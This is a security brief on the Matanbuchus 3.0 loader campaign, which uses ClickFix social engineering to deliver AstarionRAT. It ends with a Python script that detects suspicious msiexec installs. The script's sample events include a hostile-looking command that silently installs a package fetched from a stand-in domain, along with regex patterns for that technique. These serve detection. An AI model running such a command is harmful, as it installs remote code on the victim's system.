What happened
The Matanbuchus malware loader resurfaced in February 2026 with a fully rewritten version 3.0 that uses ClickFix social engineering to trick victims into manually executing malicious commands that initiate infection. Victims are presented with fake browser or software error prompts instructing them to run PowerShell or Run dialog commands, which silently install malware using msiexec without visible user interaction. Researchers at Huntress observed that the infection chain deploys a previously unseen remote access trojan called AstarionRAT, capable of credential theft, proxying traffic, and remote system control. The malware uses techniques such as DLL sideloading with legitimate antivirus binaries, renamed utilities like 7-Zip to extract payloads, and in-memory execution to evade forensic detection and maintain persistent access.
Who is affected
Organizations and users running Microsoft Windows systems are affected if victims execute malicious commands prompted through ClickFix social engineering, allowing attackers to deploy the Matanbuchus loader and AstarionRAT remote access malware.
Why CISOs should care
The campaign demonstrates how malware loaders increasingly rely on social engineering rather than software vulnerabilities, enabling attackers to bypass traditional defenses and establish persistent access within enterprise environments.
3 practical actions
- Monitor for suspicious msiexec activity. Detect mixed-case msiexec execution and connections to newly registered domains.
- Audit endpoint activity for unusual directories and persistence artifacts. Identify malware staging directories and DLL sideloading behavior.
- Train users to avoid executing unsolicited commands. Prevent infections caused by ClickFix social engineering prompts.
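The first action above, turned into detection logic as an added example (not code from the brief or from Huntress): it scores Windows process-creation events for the traits the brief calls out, a mixed-case spelling of msiexec, a package fetched from a URL (the hook for a domain-age check), and a quiet install launched from a shell a user types into. The event fields and sample events are constructed to look like simplified Sysmon process-creation records and are assumptions, not telemetry from the campaign.

```python
import re

# Constructed sample process-creation events (Sysmon-style fields, simplified).
# These are illustrative only, not telemetry from the campaign described above.
SAMPLE_EVENTS = [
    {"CommandLine": "msiexec.exe /i C:\\Temp\\vendor-update.msi /qn",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"CommandLine": "MsIeXeC /i http://newly-registered.example/pkg.msi /qn",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"CommandLine": "msiexec /i https://cdn.example/setup.msi /q",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"CommandLine": "notepad.exe C:\\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

MSIEXEC_TOKEN = re.compile(r"\bmsiexec(?:\.exe)?\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
QUIET_FLAG = re.compile(r"(?:^|\s)/q[nb]?\b", re.IGNORECASE)
# Parents that indicate a human typed the command (PowerShell, cmd, the Run dialog via explorer).
INTERACTIVE_PARENTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "explorer.exe")


def score_event(event):
    """Return the reasons an event looks like a ClickFix-style msiexec install (empty if none)."""
    cmd = event.get("CommandLine", "")
    match = MSIEXEC_TOKEN.search(cmd)
    if not match:
        return []
    reasons = []
    token = match.group(0)
    # Odd casing ("MsIeXeC") hints at an attempt to dodge case-sensitive string matches.
    # Tune for spellings that are normal in your estate (e.g. "MsiExec.exe" in uninstall strings).
    if token not in (token.lower(), token.upper()):
        reasons.append("mixed-case msiexec token")
    if REMOTE_URL.search(cmd):
        reasons.append("package fetched from a URL")  # pivot to domain age / reputation here
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in INTERACTIVE_PARENTS and QUIET_FLAG.search(cmd):
        reasons.append("quiet install launched from an interactive shell")
    return reasons


def find_suspicious(events):
    """Return (index, reasons) for every event with at least one reason."""
    return [(i, r) for i, e in enumerate(events) if (r := score_event(e))]


if __name__ == "__main__":
    for idx, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
```

The service-driven install from svchost.exe in the first sample scores nothing, which is the point: the signal is the combination of casing, remote package and interactive parent, not msiexec itself.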
